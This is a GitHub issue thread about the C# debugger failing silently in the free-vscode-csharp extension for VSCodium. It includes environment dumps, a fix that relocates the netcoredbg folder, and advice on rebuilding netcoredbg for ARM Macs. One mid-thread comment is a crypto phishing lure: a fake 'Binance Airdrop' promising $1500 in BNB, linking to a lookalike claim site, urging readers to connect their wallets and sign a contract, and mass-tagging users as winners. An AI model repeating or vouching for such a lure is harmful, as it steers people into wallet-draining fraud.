### ISSUE TITLE
Debugger Not Working

### ISSUE THREAD

**Issue by j0of** [muhammadsammy/free-vscode-csharp#64]
Hey there,
I recently migrated to VSCodium from VSCode for writing C# code, since IDEs like Rider and VS2022 are a bit too heavy for my machine (on their own, they work fine, but I like to multitask a lot while I code, which isn't really possible with a huge IDE taking 80% of my RAM).
The linting, intellisense, and everything else work fine, but debugging doesn't seem to be working.

Running a Hello World program doesn't give me any errors, but also doesn't greet the world.
![image](https://github.com/muhammadsammy/free-vscode-csharp/assets/124946864/846dd91b-5621-43c5-9db9-34b83fa6c390)
I tested this with several other projects, including a simple game built with Monogame, but it didn't load a window either.

I have also tried changing the `"console":` field in .vscode/launch.json, but it didn't make any changes. Other than that, the launch.json file is pretty much untouched and fully generated by the "generate assets" popup that appears when I open a C# project, but here it is just in case:
```
{
    "version": "0.2.0",
    "configurations": [
        {
            // Use IntelliSense to find out which attributes exist for C# debugging
            // Use hover for the description of the existing attributes
            // For further information visit https://github.com/dotnet/vscode-csharp/blob/main/debugger-launchjson.md
            "name": ".NET Core Launch (console)",
            "type": "coreclr",
            "request": "launch",
            "preLaunchTask": "build",
            // If you have changed target frameworks, make sure to update the program path.
            "program": "${workspaceFolder}/bin/Debug/net8.0/test.dll",
            "args": [],
            "cwd": "${workspaceFolder}",
            // For more information about the 'console' field, see https://aka.ms/VSCode-CS-LaunchJson-Console
            "console": "internalConsole",
            "stopAtEntry": false
        },
        {
            "name": ".NET Core Attach",
            "type": "coreclr",
            "request": "attach"
        }
    ]
}
```

**Comment by a-prokopyev-resume** [comment]
The same issue.

Neither modern LSP nor old Omnisharp method work.

**Comment by j0of** [comment]
VSCodium:
```
Version: 1.84.2
Release: 23319
Commit: 1fc52b725b3f76b97eadfd988cea42a739ae923f
Date: 2023-11-15T22:06:28.743Z
Electron: 25.9.2
ElectronBuildId: undefined
Chromium: 114.0.5735.289
Node.js: 18.15.0
V8: 11.4.183.29-electron.0
OS: Windows_NT x64 10.0.22631
```
Here is the output from `dotnet --info`:
```
.NET SDK:
 Version:           8.0.100
 Commit:            57efcf1350
 Workload version:  8.0.100-manifests.1eabc556

Runtime Environment:
 OS Name:     Windows
 OS Version:  10.0.22631
 OS Platform: Windows
 RID:         win-x64
 Base Path:   C:\Program Files\dotnet\sdk\8.0.100\

.NET workloads installed:
 Workload version: 8.0.100-manifests.1eabc556
There are no installed workloads to display.

Host:
  Version:      8.0.0
  Architecture: x64
  Commit:       5535e31a71

.NET SDKs installed:
  6.0.417 [C:\Program Files\dotnet\sdk]
  7.0.311 [C:\Program Files\dotnet\sdk]
  8.0.100-rc.2.23502.2 [C:\Program Files\dotnet\sdk]
  8.0.100 [C:\Program Files\dotnet\sdk]

.NET runtimes installed:
  Microsoft.AspNetCore.App 6.0.25 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.AspNetCore.App 7.0.14 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.AspNetCore.App 8.0.0-rc.2.23480.2 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.AspNetCore.App 8.0.0 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
  Microsoft.NETCore.App 6.0.25 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.NETCore.App 7.0.14 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.NETCore.App 8.0.0-rc.2.23479.6 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.NETCore.App 8.0.0 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
  Microsoft.WindowsDesktop.App 6.0.25 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
  Microsoft.WindowsDesktop.App 7.0.14 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
  Microsoft.WindowsDesktop.App 8.0.0-rc.2.23479.10 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
  Microsoft.WindowsDesktop.App 8.0.0 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]

Other architectures found:
  x86   [C:\Program Files (x86)\dotnet]
    registered at [HKLM\SOFTWARE\dotnet\Setup\InstalledVersions\x86\InstallLocation]

Environment variables:
  Not set

global.json file:
  Not found
```
I am unsure about the last two. How do I get output from Omnisharp and in which menu can I find the options Dotnet > Server: Use omnisharp ?
Thanks!

**Comment by a-prokopyev-resume** [comment]
> in which menu can I find the options Dotnet > Server: Use omnisharp ?

In the setting of the C# addon.

Type following in the search: @ext:muhammad-sammy.csharp omnisharp

**Comment by muhammadsammy** [comment]
I can't reproduce this issue. the debugger seems to work properly.

**Comment by StegBrind** [comment]
I have literally the same issue. When launching the debugger, it builds the project and doesn't do anything afterwards. No errors

**Comment by a-prokopyev-resume** [comment]
> I can't reproduce this issue. The debugger seems to work properly.

May I please know your environment where you try to reproduce it?
I mean the OS and VSCodium versions you use like I mentioned mine above.

Are you interested to test this issue in a docker container image which can be connected to host Xorg via a unix socket (via docker volume) or `ssh -X` ?
Such image would have a Debian + .NET v7.latest + VSCodium, which would provide you almost identical environment where I test.

**Comment by muhammadsammy** [comment]
## OS

Debian sid

## VSCodium

```
Version: 1.84.2
Release: 23319
Commit: 1fc52b725b3f76b97eadfd988cea42a739ae923f
Date: 2023-11-15T21:57:44.436Z
Electron: 25.9.2
ElectronBuildId: undefined
Chromium: 114.0.5735.289
Node.js: 18.15.0
V8: 11.4.183.29-electron.0
OS: Linux x64 6.5.0-gnu
```

## DotNet

```
dpkg -al | grep dotnet
ii  dotnet-apphost-pack-3.1                                     3.1.32-1                                                     amd64        Microsoft.NETCore.App.Host 3.1.32
ii  dotnet-apphost-pack-5.0                                     5.0.17-1                                                     amd64        Microsoft.NETCore.App.Host 5.0.17
ii  dotnet-apphost-pack-6.0                                     6.0.25-1                                                     amd64        Microsoft.NETCore.App.Host 6.0.25
ii  dotnet-apphost-pack-7.0                                     7.0.14-1                                                     amd64        Microsoft.NETCore.App.Host 7.0.14
ii  dotnet-apphost-pack-8.0                                     8.0.0-1                                                      amd64        Microsoft.NETCore.App.Host 8.0.0
ii  dotnet-host                                                 8.0.0-1                                                      amd64        Microsoft .NET Host - 8.0.0
ii  dotnet-hostfxr-3.1                                          3.1.32-1                                                     amd64        Microsoft .NET Core Host FX Resolver - 3.1.32 3.1.32
ii  dotnet-hostfxr-5.0                                          5.0.17-1                                                     amd64        Microsoft .NET Host FX Resolver - 5.0.17 5.0.17
ii  dotnet-hostfxr-6.0                                          6.0.25-1                                                     amd64        Microsoft .NET Host FX Resolver - 6.0.25
ii  dotnet-hostfxr-7.0                                          7.0.14-1                                                     amd64        Microsoft .NET Host FX Resolver - 7.0.14
ii  dotnet-hostfxr-8.0                                          8.0.0-1                                                      amd64        Microsoft .NET Host FX Resolver - 8.0.0
ii  dotnet-runtime-3.1                                          3.1.32-1                                                     amd64        Microsoft .NET Core Runtime - 3.1.32 Microsoft.NETCore.App 3.1.32
ii  dotnet-runtime-5.0                                          5.0.17-1                                                     amd64        Microsoft .NET Runtime - 5.0.17 Microsoft.NETCore.App 5.0.17
ii  dotnet-runtime-6.0                                          6.0.25-1                                                     amd64        Microsoft.NETCore.App.Runtime 6.0.25
ii  dotnet-runtime-7.0                                          7.0.14-1                                                     amd64        Microsoft.NETCore.App.Runtime 7.0.14
ii  dotnet-runtime-8.0                                          8.0.0-1                                                      amd64        Microsoft.NETCore.App.Runtime 8.0.0
ii  dotnet-runtime-deps-3.1                                     3.1.32-1                                                     amd64        dotnet-runtime-deps-3.1 3.1.32
ii  dotnet-runtime-deps-5.0                                     5.0.17-1                                                     amd64        dotnet-runtime-deps-5.0 5.0.17
ii  dotnet-runtime-deps-6.0                                     6.0.25-1                                                     amd64        dotnet-runtime-deps-debian 6.0.25
ii  dotnet-runtime-deps-7.0                                     7.0.14-1                                                     amd64        dotnet-runtime-deps-debian 7.0.14
ii  dotnet-runtime-deps-8.0                                     8.0.0-1                                                      amd64        dotnet-runtime-deps-debian 8.0.0
ii  dotnet-sdk-3.1                                              3.1.426-1                                                    amd64        Microsoft .NET Core SDK 3.1.426
ii  dotnet-sdk-5.0                                              5.0.408-1                                                    amd64        Microsoft .NET SDK 5.0.408
ii  dotnet-sdk-6.0                                              6.0.417-1                                                    amd64        Microsoft .NET SDK 6.0.417
ii  dotnet-sdk-7.0                                              7.0.404-1                                                    amd64        Microsoft .NET SDK 7.0.404
ii  dotnet-sdk-8.0                                              8.0.100-1                                                    amd64        Microsoft .NET SDK 8.0.100
ii  dotnet-targeting-pack-3.1                                   3.1.0-1                                                      amd64        Microsoft.NETCore.App.Ref 3.1.0
ii  dotnet-targeting-pack-5.0                                   5.0.0-1                                                      amd64        Microsoft.NETCore.App.Ref 5.0.0
ii  dotnet-targeting-pack-6.0                                   6.0.25-1                                                     amd64        Microsoft.NETCore.App.Ref 6.0.25
ii  dotnet-targeting-pack-7.0                                   7.0.14-1                                                     amd64        Microsoft.NETCore.App.Ref 7.0.14
ii  dotnet-targeting-pack-8.0                                   8.0.0-1                                                      amd64        Microsoft.NETCore.App.Ref 8.0.0
```

**Comment by muhammadsammy** [comment]
> Are you interested to test this issue in a docker container image which can be connected to host Xorg via a unix socket (via docker volume) or `ssh -X` ? Such image would have a Debian + .NET v7.latest + VSCodium, which would provide you almost identical environment where I test.

Sure :+1:

**Comment by JokerBoom** [comment]
The same issue：
Version: 0.20.2
VSCode Version: 1.84.2
Commit: 33c8b08492b48664cb00a8ab054f2d60697bbf90
Date: 2023-12-19T02:08:30.362Z
Electron: 25.9.2
ElectronBuildId: undefined
Chromium: 114.0.5735.289
Node.js: 18.15.0
V8: 11.4.183.29-electron.0
OS: Windows_NT x64 10.0.22631

**Comment by muhammadsammy** [comment]
Try manually changing the debugger path from `.vscode-oss/extensions/muhammad-sammy.csharp-2.14.8-universal/.debugger/netcorebg/netcoredbg` to `.vscode-oss/extensions/muhammad-sammy.csharp-2.14.8-universal/.debugger/x86_64/netcorebg/netcoredbg`

i.e. by putting the netcoredbg foder into a folder named after the platform architechture (x86_64)

**OR**

Try on of the provided artifacts with the fix from here: https://github.com/muhammadsammy/free-vscode-csharp/actions/runs/7359577421#artifacts



@JokerBoom  @StegBrind @a-prokopyev-resume @j0of

**Comment by JokerBoom** [comment]
it's working.
Thanks!

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @songproducer, @jarirajari, @99ashutosh, @gnl, @fedo, @zartan666, @frabrunelle, @meodemsao, @chenyafei617, @jorge-campo, @noconstruct, @vishnuvaradaraj, @pedroenriquefreitas, @wesrer, @Jisen, @ajanuar, @swjz, @houdl, @jacqueswww, @wowtoshi, @nwhitmont, @adriaanbd, @mmindi, @0xc1c4da, @0frasure, @morelazers, @LeRinge, @ukexim13, @megayu, @cavb, @cosmojg, @LinArcX, @aihuasxy, @dongguaguaguagua, @yuttian, @0xdevalias, @calweb, @jgtorrejon, @bdavis5583, @Urbanoid, @vehas, @nrwlia, @sggts04, @bangkaichen, @empeje, @yishengreai, @gourav-singhal, @sineer, @checkming, @goz

**Comment by muhammadsammy** [comment]
Closing this issue as it is resolved.
If the issue presists, please reopen.

**Comment by jabarig** [comment]
I'm having a similar issue when running the "Hello Word" C# project. The Debugger buttons appear for a second then disappear. Then the terminal displays this:
 ```
*  Executing task: dotnet build /Users/jabarig/repos/the_ether/the_ether.csproj /property:GenerateFullPaths=true /consoleloggerparameters:NoSummary;ForceNoAlign 

MSBuild version 17.9.6+a4ecab324 for .NET
  Determining projects to restore...
  All projects are up-to-date for restore.
  the_ether -> /Users/jabarig/repos/the_ether/bin/Debug/net8.0/the_ether.dll
 *  Terminal will be reused by tasks, press any key to close it. 
```

It doesn't show the run output like the OPs issue. Both the Output & Debug Console display nothing. The Problems tab says there are no problems detected. I'm not sure how to change the path locations. I can change them in my OS of course but I'm not sure how to update that new path in the extension's settings.
 
VS Codium
```
Version: 1.88.0
Release: 24096
Commit: 0f99737786f756fe93e2a6e5d8146c46f4a53a4f
Date: 2024-04-05T12:32:16.317Z
Electron: 28.2.8
ElectronBuildId: undefined
Chromium: 120.0.6099.291
Node.js: 18.18.2
V8: 12.0.267.19-electron.0
OS: Darwin arm64 23.2.0
```

VS Codium Settings:
`"omnisharp.enableDecompilationSupport": true`

% dotnet --info
```
.NET SDK:
Version:           8.0.203
Commit:            5e1ceea679
Workload version:  8.0.200-manifests.a7f084b6
Runtime Environment:
OS Name:     Mac OS X
OS Version:  14.2
OS Platform: Darwin
RID:         osx-arm64
Base Path:   /usr/local/share/dotnet/sdk/8.0.203/  
.NET workloads installed:
There are no installed workloads to display.
Host:
Version:      8.0.3
Architecture: arm64
Commit:       9f4b1f5d66
.NET SDKs installed:
8.0.203 [/usr/local/share/dotnet/sdk]
.NET runtimes installed:
Microsoft.AspNetCore.App 8.0.3 [/usr/local/share/dotnet/shared/Microsoft.AspNetCore.App]
Microsoft.NETCore.App 8.0.3 [/usr/local/share/dotnet/shared/Microsoft.NETCore.App]
Other architectures found:
None
Environment variables:
DOTNET_ROOT       [/Users/jabarig/dotnet]
global.json file:
Not found
Learn more:
https://aka.ms/dotnet/info
Download .NET:
https://aka.ms/dotnet/download
```

**Comment by zysim** [comment]
@jabarig Dunno if you're still facing this, but it's as simple as replacing the contents of `~/.vscode-oss/extensions/muhammad-sammy.csharp-<version>-universal/.debugger/netcorebg` (assuming you didn't move your extension installation path) with the right version of `netcoredbg` (+ its associated libs, of course) for your arch, and things should work. I'm on the same arch as you are (and had the same problem of having no error output too 🫠), so this should fix things for you. Don't bother looking through the extension's settings; you won't find anything helpful there.

For anyone else reading this who needs more context; get the right version of `netcoredbg` [here](https://github.com/Samsung/netcoredbg/releases). If you're also on an M chip Mac, you'll have to download and install the source yourself; [follow their instructions](https://github.com/Samsung/netcoredbg?tab=readme-ov-file#macos) and you should be fine. And if you get a "Compatibility with CMake < 3.5 has been removed from CMake." error at the `cmake` stage, passing `-DCMAKE_POLICY_VERSION_MINIMUM=3.5` as mentioned at the end of the error should succeed without issue.

**Comment by kadisonm** [comment]
@zysim Thanks for the explanation. Does your internal terminal work? As I keep getting this error whenever  I try to give an input on Console.ReadLine().

I've tried using the external console in the launch json but nothing opens.

<img width="611" height="176" alt="Image" src="https://github.com/user-attachments/assets/a931710b-d407-41d8-9108-d4e28e1f431d" />

**Comment by zysim** [comment]
@kadisonm my terminal does work. Unfortunately I never came across the issue you're having right now; not sure how I can help.

**Comment by kadisonm** [comment]
@zysim No worries, I ended up going with a windows VM to fix it. Thanks though.
